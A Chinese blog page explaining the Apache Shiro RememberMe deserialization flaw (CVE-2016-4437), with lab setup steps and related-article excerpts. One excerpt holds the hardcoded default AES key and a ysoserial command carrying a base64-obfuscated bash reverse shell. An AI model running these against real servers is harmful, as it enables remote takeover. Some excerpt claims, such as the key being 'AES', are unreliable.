shiro反序列化

最新推荐文章于 2025-11-01 18:09:44 发布

原创最新推荐文章于 2025-11-01 18:09:44 发布 · 973 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#安全

ApacheShiro框架的RememberMe功能存在一个安全漏洞，允许攻击者通过构造特定的Payload，利用未修改的默认AES密钥进行反序列化远程代码执行。该漏洞影响Shiro1.2.4及更低版本，涉及的步骤包括命令序列化、AES加密、Base64编码并设置为Cookie值。文章提到了漏洞复现的环境配置以及靶场镜像的获取方法。

漏洞原理：

Apache Shiro框架提供了记住密码的功能（RememberMe），用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值，先base64解码然后AES解密再反序列化，就导致了反序列化RCE漏洞。
那么，Payload产生的过程：
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值
在整个漏洞利用过程中，比较重要的是AES加密的密钥，如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。

影响版本：

Apache Shiro <= 1.2.4

shiro 默认使用了 CookieRememberMeManager，其处理cookie的流程是：

得到rememberMe的cookie值 --> Base64解码 --> AES解密 --> 反序列化

然而AES的密钥是硬编码的，导致攻击者可以构造任意数据造成反序列化RCE，payload：

恶意命令–>序列化–>AES加密–>base64编码–>发送cookie

漏洞复现

kali ip：192.168.5.128
centos靶机ip：192.168.5.130

拉取靶场镜像

docker pull medicean/vulapps:s_shiro_1
docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
原本端口是8080给他换成8081

在这里插入图片描述
后面的步骤就不做具体分析了，可以看看这篇
shiro反序列化漏洞复现

关注博主即可阅读全文

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

不能不通

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Apache Shiro 1.2.4反序列化漏洞(Shiro-550)--Shiro rememberMe反序列化漏洞(CVE-2016-4437)

薛定谔嘚喵博客

05-10

2161

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。

【漏洞复现】shiro 反序列化 （CVE-2016-4437）

飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘

08-14

871

Apache Shiro是一个强大且易用的Java安全框架，执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API，开发者可以快速、轻松地获得任何应用程序，从最小的移动应用程序到最大的网络和企业应用程序。...

参与评论您还未登录，请先登录后发表或查看评论

Shiro-550反序列化漏洞分析

weixin_44770698的博客

11-24

1326

Shrio550反序列化漏洞分析

Shiro 反序列化

最新发布

2502_91116367的博客

11-01

1002

摘要本文详细分析了Apache Shiro 1.2.4及以下版本的反序列化漏洞（Shiro-550）。该漏洞源于RememberMe功能的AES加密机制存在缺陷：加密密钥硬编码为"kPH+bIxk5D2deZiIxcaaaA=="，且未对反序列化进行安全过滤。攻击者可构造恶意Cookie，通过AES-CBC加密伪造序列化数据，最终触发ObjectInputStream.readObject()导致RCE。文章还提供了完整的漏洞环境搭建方法（JDK8u65+Tomcat8+Shiro1.

Shiro RememberMe 反序列化漏洞

hbxf_xs的博客

11-27

2335

Apache Shiro 反序列化漏洞 1）、Apache Shiro框架提供了记住我的功能（RememberMe），用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe，cookie的值是经过对相关信息进行序列化，然后使用aes加密，最后在使用base64编码处理形成的。在服务端接收cookie值时，按照如下步骤来解析处理： 1、检索RememberMe cookie 的值 2、Base 64解码 3、使用AES解密(加密密钥硬编码) 4、进行反序列化操作（未作

精选资源

shiro反序列化工具，加强版

12-27

在"shiro反序列化工具，加强版"这个主题中，我们主要关注的是Shiro框架中可能存在的反序列化漏洞以及如何利用和防范这些漏洞。 反序列化漏洞是由于程序在接收到网络传输的数据后，将其从二进制流恢复为对象时没有...

精选资源

ShiroExp-1.3.1-all.jar shiro反序列化检测工具

01-12

ShiroExp-1.3.1-all.jar shiro反序列化检测工具我这里是用于搭建攻防演练演示环境用

精选资源

shiro反序列化脚本.zip

07-28

标题 "shiro反序列化脚本.zip" 指向的是一个与Apache Shiro安全框架相关的反序列化漏洞利用工具。Apache Shiro是一款广泛使用的Java安全框架，它提供了身份验证、授权、会话管理和加密等功能。然而，在某些版本中，...

shiro反序列化复现.zip

08-03

"shiro反序列化复现.zip"这个压缩包很可能是为了帮助开发者或者安全研究人员理解并重现Apache Shiro中的反序列化漏洞。 反序列化漏洞通常发生在程序接收来自不可信源的序列化对象时，如果这个对象包含了恶意构造的...

【shiro】shiro反序列化漏洞综合利用工具v2.2（下载、安装、使用）

yy1715713348的博客

03-29

4325

压箱底的好资料，全面地介绍网络安全的基础理论，包括逆向、八层网络防御、汇编语言、白帽子web安全、密码学、网络安全协议等，将基础理论和主流工具的应用实践紧密结合，有利于读者理解各种主流工具背后的实现机制。对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。我们在看视频学习的时候，不能光动眼动脑不动手，比较科学的学习方法是在理解之后运用它们，这时候练手项目就很适合了。客常用的开发软件都在这里了，给大家节省了很多时间。

shiro反序列化漏洞暴力破解漏洞检测工具

09-14

文件内包含内容如下： 1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro反序列化漏洞、暴力破解漏洞修改方法

shiro反序列化漏洞利用工具

11-09

图形化界面，该工具支持漏洞检测，请勿用作非法途径，否则后果自负。 Shiro550无需提供rememberMe Cookie，Shiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType（支持多选），如果不指定会遍历所有的 Key/Gadget/EchoType 复杂Http请求支持直接粘贴数据包 pic1

[Java反序列化]—Shiro反序列化(一)

snowlyzz的博客

12-05

7907

shiro -550 反序列化（一）

今天，咱不讲三国，就聊聊Shiro的反序列化漏洞，以及内存马技术！

localhost01

07-15

8191

Shiro反序列化漏洞漏洞介绍上图为Shiro默认的登录页面，页面可见：Shiro提供了记住我（RememberMe）的功能。然而，Shiro对rememberMe的cookie做了加密处理，shiro在CookieRememberMeManaer类中将cookie中rememberMe字段内容分别进行：序列化、AES加密、Base64编码，三个操作。而在识别身份的时候，则需要对Cookie里的rememberMe字段进行逆操作： Base64解码 AES解密 反序列化 由于AES加密的密钥K

shiro-反序列化漏洞

weixin_54217950的博客

07-26

6914

shiro反序列化漏洞

shiro反序列化分析

2301_79724395的博客

06-11

1887

Apache Shiro 是一个 Java 安全框架，包括如下功能和特性：Authentication：身份认证/登陆，验证用户是不是拥有相应的身份。在 Shiro 中，所有的操作都是基于当前正在执行的用户，这里称之为一个 Subject，在用户任意代码位置都可以轻易取到这个Subject。

shiro 反序列化

04-02

### Apache Shiro 反序列化漏洞原理 Apache Shiro 是一个功能强大的 Java 安全框架，用于处理身份验证、授权、加密以及会话管理等功能。然而，在某些版本中存在反序列化漏洞，这可能导致远程代码执行 (RCE) 攻击。 #### 漏洞产生的原因 Shiro 的 `rememberMe` 功能允许用户通过保存的 cookie 自动登录系统。此功能依赖于序列化和反序列化机制存储用户的会话信息。如果攻击者能够控制输入并提供恶意序列化的对象，则可能触发反序列化漏洞[^1]。具体来说： - **默认密钥问题**：Shiro 使用了一个固定的默认密钥 (` rememberMe` 密钥为 `"AES"` 或其他硬编码值)，使得攻击者可以轻松预测密钥并伪造有效的会话令牌。 - **不安全的反序列化实现**：在早期版本中，Shiro 对传入的数据未进行充分校验，从而允许攻击者注入恶意的对象结构。 --- ### 修复方案为了有效缓解这一安全隐患，以下是两种推荐的修复措施： #### 方案一：升级到最新版本确保使用的 Shiro 版本是最新的稳定版（如当前最新的 1.7.x）。新版本修复了已知的安全缺陷，并引入了许多增强的安全特性。例如，自 1.5.0 起，默认情况下禁用了基于 JSP 的视图解析器，减少了潜在风险。 #### 方案二：修改 RememberMe 默认密钥即使升级到了较新的版本，仍需关注 `rememberMe` 功能中的密钥安全性。可以通过以下方式加强防护： - 配置唯一的随机密钥替代默认值； - 将密钥设置为复杂字符串，并严格保密以防泄露[^5]。示例配置如下所示： ```properties securityManager.rememberMeManager.cipherKey=Base64EncodedRandomStringHere== ``` 此外，还可以启用 HTTPS 加密传输层协议保护敏感数据免受中间人劫持攻击的影响。 --- ### 实战案例分析在网络渗透测试场景下，利用此类漏洞通常涉及以下几个环节[^2]: 1. 找寻目标服务端暴露的服务接口或者 URL 地址； 2. 利用工具生成特定 payload 并发送给服务器； 3. 成功获取 shell 后进一步探索内部网络环境。一种常见的利用手法是借助第三方库 YSOserial 构建恶意负载并通过 JRMPListener 工具监听连接请求完成交互过程[^4]: ```bash java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8xMDk5IDA+JjE=}|{base64,-d}|{bash,-i}" ``` 上述命令创建了一个等待客户端连接的 RMI Server ，一旦受害主机尝试访问它就会被执行指定的操作指令。 --- ### 总结综上所述，针对 Apache Shiro 中存在的反序列化漏洞应采取综合手段加以防范。除了及时更新软件外还需重视个性化参数调整工作比如更改默认 key 等操作以提高整体系统的健壮性和抗攻击能力。